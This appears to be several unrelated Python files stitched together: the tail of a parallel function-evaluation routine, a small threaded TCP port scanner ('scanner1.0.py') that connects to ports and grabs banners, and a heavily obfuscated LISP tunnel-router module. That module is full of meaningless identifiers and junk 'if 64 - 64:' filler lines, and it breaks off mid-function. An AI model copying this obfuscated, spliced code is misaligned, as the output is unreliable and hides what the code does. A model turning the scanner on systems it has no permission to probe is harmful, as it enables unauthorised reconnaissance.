"""
from multiprocessing import Process, Pipe
# --- parallel evaluation of the function
divided_samples = [x[i::self.n_procs] for i in range(self.n_procs)]
pipe = [Pipe() for i in range(self.n_procs)]
proc = [Process(target=spawn(self._eval_func),args=(c,k)) for k,(p,c) in zip(divided_samples,pipe)]
[p.start() for p in proc]
[p.join() for p in proc]
# --- time of evaluation is set to constant (=1). This is one of the hypothesis of synchronous batch methods.
f_evals = np.zeros((x.shape[0],1))
cost_evals = np.ones((x.shape[0],1))
i = 0
for (p,c) in pipe:
f_evals[i::self.n_procs] = p.recv()[0] # throw away costs
i += 1
return f_evals, cost_evals
def _asyncronous_batch_evaluation(self,x):
"""
Performs the evaluation of the function at x while other evaluations are pending.
"""
### --- TODO
pass
|
scanner1.0.py | # coding=utf-8
'''
Author:joe
Description: scanner of InterNet servers
1、模块 argparse(Generic Operation System Services)
2、获取命令行输入的目标地址和端口 :Host,Port
3、-H host -p port
4、多线程 加锁
'''
import argparse
import socket
import threading
SCREEN_LOCK = threading.Semaphore(value=1)
def get_tgthostandport():
'''
获取命令行输入的目标地址和端口
Parameters:
None
Returns:
(host, port)
'''
parser = argparse.ArgumentParser(description="Get Target Host and Port")
parser.add_argument('-H', dest='Host', help='input host')
parser.add_argument('-p', dest='Port', nargs='+', type=int, help='input port')
# print(parser.parse_args())
address = parser.parse_args()
host = address.Host
port = address.Port
#print(type(host))
#print(type(port))
return [host, port]
def conn_scan(tg_host, tg_port):
'''
connect host port
Paremters:
tg_host, tg_port
Returns:
None
'''
try:
conn_stk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn_stk.connect((tg_host, tg_port))
conn_stk.send(b"hello/r/n")
reslut = conn_stk.recv(100)
SCREEN_LOCK.acquire()
print('[+]%d tcp is open'%(tg_port))
print('[+]' + str(reslut))
except:
SCREEN_LOCK.acquire()
print('[-]%d tcp closed'%(tg_port))
finally:
SCREEN_LOCK.release()
conn_stk.close()
'''
ADDRESS = get_tgthostandport()
print(ADDRESS)
'''
def port_scan():
'''
get the tgt_host_ip tgt_host_name
Paramters: None
Returns:
'''
tg_host = get_tgthostandport()[0]
tg_port = get_tgthostandport()[1]
try:
tg_ip = socket.gethostbyname(tg_host)
except:
print('Can not get target ip by %s'%(tg_host))
return
try:
tg_name = socket.gethostbyaddr(tg_ip)
print(tg_name)
print("\n scan reslut for:" + tg_name[0])
except:
print('\n[+]scan reslut for: ' + tg_ip + ' : ' + tg_host)
socket.setdefaulttimeout(10)
for tgport in tg_port:
print('sanning port :'+str(tgport))
#conn_scan(tg_host, int(tgport))
t = threading.Thread(target=conn_scan, args=(tg_host,int(tgport)))
t.start()
# port_scan()
if __name__ == '__main__':
port_scan()
|
lisp-itr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import pcappy
import time
import os
import commands
import struct
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = lisp . lisp_get_ephemeral_port ( )
Ii1IIii11 = None
Oooo0000 = None
i11 = None
I11 = None
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
oo0O000OoO = False
if 34 - 34: I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
i1iIIi1 = threading . Lock ( )
if 50 - 50: i11iIiiIii - Ii1I
if 78 - 78: OoO0O00
if 18 - 18: O0 - iII111i / iII111i + ooOoO0o % ooOoO0o - IiII
if 62 - 62: iII111i - IiII - OoOoOO00 % i1IIi / oO0o
if 77 - 77: II111iiii - II111iiii . I1IiiI / o0oOOo0O0Ooo
if 14 - 14: I11i % O0
if 41 - 41: i1IIi + I1Ii111 + OOooOOo - IiII
if 77 - 77: Oo0Ooo . IiII % ooOoO0o
def IIiiIiI1 ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "ITR" , [ ] ) )
if 41 - 41: OoOoOO00
if 13 - 13: Oo0Ooo . i11iIiiIii - iIii1I11I1II1 - OoOoOO00
if 6 - 6: I1IiiI / Oo0Ooo % Ii1I
if 84 - 84: i11iIiiIii . o0oOOo0O0Ooo
if 100 - 100: Ii1I - Ii1I - I1Ii111
if 20 - 20: OoooooooOO
if 13 - 13: i1IIi - Ii1I % oO0o / iIii1I11I1II1 % iII111i
def oo ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "ITR" ) )
if 68 - 68: I11i + OOooOOo . iIii1I11I1II1 - IiII % iIii1I11I1II1 - ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
def I1i1iii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "ITR" ) )
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0 ( lisp_sockets , lisp_ephem_port ) :
lisp . lisp_set_exception ( )
if 57 - 57: OOooOOo . OOooOOo
if 95 - 95: O0 + OoO0O00 . II111iiii / O0
if 97 - 97: ooOoO0o - OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - OoooooooOO
if 59 - 59: O0 + I1IiiI + IiII % I1IiiI
for o0OOoo0OO0OOO in lisp . lisp_crypto_keys_by_nonce . values ( ) :
for iI1iI1I1i1I in o0OOoo0OO0OOO : del ( iI1iI1I1i1I )
if 24 - 24: I1ii11iIi11i
lisp . lisp_crypto_keys_by_nonce = { }
if 56 - 56: ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if ( lisp . lisp_l2_overlay ) :
O0o0 = lisp . LISP_AFI_MAC
OO00Oo = lisp . lisp_default_iid
O0OOO0OOoO0O = lisp . lisp_address ( O0o0 , "0000-0000-0000" , 0 , OO00Oo )
O0OOO0OOoO0O . mask_len = 0
O00Oo000ooO0 = lisp . lisp_address ( O0o0 , "ffff-ffff-ffff" , 48 , OO00Oo )
lisp . lisp_send_map_request ( lisp_sockets , lisp_ephem_port , O0OOO0OOoO0O , O00Oo000ooO0 , None )
if 100 - 100: O0 + IiII - OOooOOo + i11iIiiIii * Ii1I
if 30 - 30: o0oOOo0O0Ooo . Ii1I - OoooooooOO
if 8 - 8: i1IIi - iIii1I11I1II1 * II111iiii + i11iIiiIii / I1Ii111 % OOooOOo
if 16 - 16: I1ii11iIi11i + OoO0O00 - II111iiii
if 85 - 85: OoOoOO00 + i1IIi
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 58 - 58: II111iiii * OOooOOo * I1ii11iIi11i / OOooOOo
if 75 - 75: oO0o
if 50 - 50: Ii1I / Oo0Ooo - oO0o - I11i % iII111i - oO0o
if 91 - 91: OoO0O00 / I11i - II111iiii . I11i
i11 = threading . Timer ( 60 , oo0 ,
[ lisp_sockets , lisp_ephem_port ] )
i11 . start ( )
return
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
def OO0oOoOO0oOO0 ( lisp_socket ) :
lisp . lisp_set_exception ( )
if 86 - 86: OOooOOo
OOoo0O = lisp . lisp_get_timestamp ( )
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . dynamic_eid_configured ( ) == False ) : continue
if 22 - 22: iIii1I11I1II1 / i11iIiiIii * iIii1I11I1II1 * II111iiii . OOooOOo / i11iIiiIii
Iiii = [ ]
for OO0OoO0o00 in Oo0ooOo0o . dynamic_eids . values ( ) :
ooOO0O0ooOooO = OO0OoO0o00 . last_packet
if ( ooOO0O0ooOooO == None ) : continue
if ( ooOO0O0ooOooO + OO0OoO0o00 . timeout > OOoo0O ) : continue
if 55 - 55: o0oOOo0O0Ooo * OoOoOO00
if 61 - 61: I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if ( lisp . lisp_program_hardware ) :
IIIIiiII111 = OO0OoO0o00 . dynamic_eid . print_prefix_no_iid ( )
if ( lisp . lisp_arista_is_alive ( IIIIiiII111 ) ) :
lisp . lprint ( ( "Hardware indicates dynamic-EID {} " + "still active" ) . format ( lisp . green ( IIIIiiII111 , False ) ) )
if 97 - 97: I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
continue
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
oOOo0oOo0 = OO0OoO0o00 . dynamic_eid . print_address ( )
II = "learn%{}%None" . format ( oOOo0oOo0 )
II = lisp . lisp_command_ipc ( II , "lisp-itr" )
lisp . lisp_ipc ( II , lisp_socket , "lisp-etr" )
if 60 - 60: I1IiiI
lisp . lprint ( "Dynamic-EID {}" . format ( lisp . bold ( lisp . green ( oOOo0oOo0 , False ) + " activity timeout" ,
# II111iiii . I1IiiI
False ) ) )
Iiii . append ( oOOo0oOo0 )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
for oOOo0oOo0 in Iiii : Oo0ooOo0o . dynamic_eids . pop ( oOOo0oOo0 )
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ lisp_socket ] ) . start ( )
return
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
def oOooOo0 ( ) :
if ( lisp . lisp_is_macos ( ) ) : return ( [ "en0" , "en1" , "lo0" ] )
if 38 - 38: I1Ii111
if 84 - 84: iIii1I11I1II1 % iII111i / iIii1I11I1II1 % I11i
if 45 - 45: O0
if 26 - 26: I11i - iIii1I11I1II1 - I1IiiI / OoO0O00 . OoOoOO00 % iIii1I11I1II1
OO = "Link encap"
iIiIIi1 = commands . getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if ( iIiIIi1 == "" ) :
OO = ": flags="
iIiIIi1 = commands . getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if 7 - 7: ooOoO0o - Oo0Ooo - oO0o + ooOoO0o
if 26 - 26: Ii1I
iIiIIi1 = iIiIIi1 . split ( "\n" )
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
I1i1Iiiii = [ ]
for OOo0oO00ooO00 in iIiIIi1 :
oOO0O00oO0Ooo = OOo0oO00ooO00 . split ( OO ) [ 0 ] . replace ( " " , "" )
I1i1Iiiii . append ( oOO0O00oO0Ooo )
if 67 - 67: OoO0O00 - OOooOOo
return ( I1i1Iiiii )
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
def I111I1Iiii1i ( ) :
global II1iII1i
global oO0oIIII
global Oo0oO0oo0oO00
global i111I
global II1Ii1iI1i
global Ii1IIii11 , Oooo0000
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_i_am ( "itr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ITR starting up" )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
II1iII1i [ 0 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV4 )
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
oO0oIIII = lisp . lisp_open_listen_socket ( "" , "lisp-itr" )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
II1iII1i [ 2 ] = oO0oIIII
OoOOoOooooOOo = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
i111I = lisp . lisp_open_listen_socket ( OoOOoOooooOOo ,
str ( iiI1iIiI ) )
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
II1Ii1iI1i = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( OOo ) )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
Ii1IIii11 = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
Ii1IIii11 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if ( lisp . lisp_is_raspbian ( ) == False ) :
Oooo0000 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
lisp . lisp_ipc_socket = oO0oIIII
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
threading . Thread ( target = OoOOo0OOoO ) . start ( )
if 72 - 72: Ii1I
if 1 - 1: OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
i11 = threading . Timer ( 60 , oo0 ,
[ II1iII1i , iiI1iIiI ] )
i11 . start ( )
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ oO0oIIII ] ) . start ( )
return ( True )
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
def o0ooooO0o0O ( ) :
iiIi11iI1iii = open ( "./lisp.config" , "r" )
if 67 - 67: O0 / I1Ii111
OOO0000oO = False
iI1i111I1Ii = 0
for i11i1ii1I in iiIi11iI1iii :
if ( i11i1ii1I == "lisp database-mapping {\n" ) : OOO0000oO = True
if ( i11i1ii1I == "}\n" ) : OOO0000oO = False
if ( OOO0000oO == False ) : continue
if ( i11i1ii1I [ 0 ] == " " and i11i1ii1I . find ( "prefix {" ) != - 1 ) : iI1i111I1Ii += 1
if 88 - 88: I11i % I1ii11iIi11i
iiIi11iI1iii . close ( )
return ( iI1i111I1Ii )
if 48 - 48: ooOoO0o / I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / i1IIi
if 92 - 92: Oo0Ooo % Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
def O00oOOooo ( ) :
if 50 - 50: I1ii11iIi11i % O0 * o0oOOo0O0Ooo
if 5 - 5: IiII * OoOoOO00
if 5 - 5: I1Ii111
if 90 - 90: I1Ii111 . ooOoO0o / Ii1I - I11i
if 40 - 40: OoooooooOO
iI1i111I1Ii = o0ooooO0o0O ( )
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
I1IiIiiIiIII = os . getenv ( "LISP_ITR_WAIT_TIME" )
I1IiIiiIiIII = 1 if ( I1IiIiiIiIII == None ) else int ( I1IiIiiIiIII )
if 8 - 8: oO0o / I1ii11iIi11i
if 20 - 20: I1IiiI
if 95 - 95: iII111i - I1IiiI
if 34 - 34: ooOoO0o * I1IiiI . i1IIi * ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
while ( iI1i111I1Ii != len ( lisp . lisp_db_list ) ) :
lisp . lprint ( ( "Waiting {} second(s) for {} database-mapping EID-" + "prefixes, {} processed so far ..." ) . format ( I1IiIiiIiIII , iI1i111I1Ii ,
# I1ii11iIi11i % OoOoOO00 * OoO0O00 % II111iiii
len ( lisp . lisp_db_list ) ) )
time . sleep ( I1IiIiiIiIII )
if 70 - 70: OoO0O00 % oO0o + OOooOOo / Ii1I % O0
if 100 - 100: o0oOOo0O0Ooo + OOooOOo * o0oOOo0O0Ooo
if 80 - 80: o0oOOo0O0Ooo * O0 - Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
oOoOO = [ ]
Ii1i1 = [ ]
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . eid . is_ipv4 ( ) or Oo0ooOo0o . eid . is_ipv6 ( ) or Oo0ooOo0o . eid . is_mac ( ) ) :
oOOo0oOo0 = Oo0ooOo0o . eid . print_prefix_no_iid ( )
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) : Ii1i1 . append ( oOOo0oOo0 )
oOoOO . append ( oOOo0oOo0 )
if 65 - 65: ooOoO0o . OoooooooOO / I1ii11iIi11i . i1IIi * OoO0O00
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
return ( oOoOO , Ii1i1 )
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
def OoOOo0OOoO ( ) :
global i1iIIi1
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
lisp . lisp_set_exception ( )
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
oOoOO , Ii1i1 = O00oOOooo ( )
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
if 46 - 46: IiII
ii1iIi1iIiI1i = None
if ( lisp . lisp_ipc_data_plane ) :
lisp . lprint ( lisp . bold ( "Data-plane packet capture disabled" , False ) )
ii1iIi1iIiI1i = "(udp src port 4342 and ip[28] == 0x28)" + " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 40 - 40: i1IIi % OOooOOo
if 71 - 71: OoOoOO00
lisp . lprint ( "Control-plane capture: '{}'" . format ( ii1iIi1iIiI1i ) )
else :
lisp . lprint ( "Capturing packets for source-EIDs {}" . format ( lisp . green ( str ( oOoOO ) , False ) ) )
if 14 - 14: i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if ( lisp . lisp_pitr ) : lisp . lprint ( "Configured for PITR functionality" )
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = lisp . lisp_l2_overlay
if ( i1 == False ) :
if ( lisp . lisp_is_linux ( ) ) : OO0oOOoo ( oOoOO , Ii1i1 )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if ( ii1iIi1iIiI1i == None ) :
if ( lisp . lisp_pitr ) :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , [ ] , False , True )
else :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , Ii1i1 , i1 ,
False )
if 57 - 57: OoOoOO00 - I1ii11iIi11i
else :
i1I11IiI1iiII = ii1iIi1iIiI1i
if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
if 59 - 59: OoooooooOO
iIiIIi1 = oOooOo0 ( )
i1iiiii1 = os . getenv ( "LISP_PCAP_LIST" )
if ( i1iiiii1 == None ) :
O0iII1 = ""
IIII1i = [ ]
else :
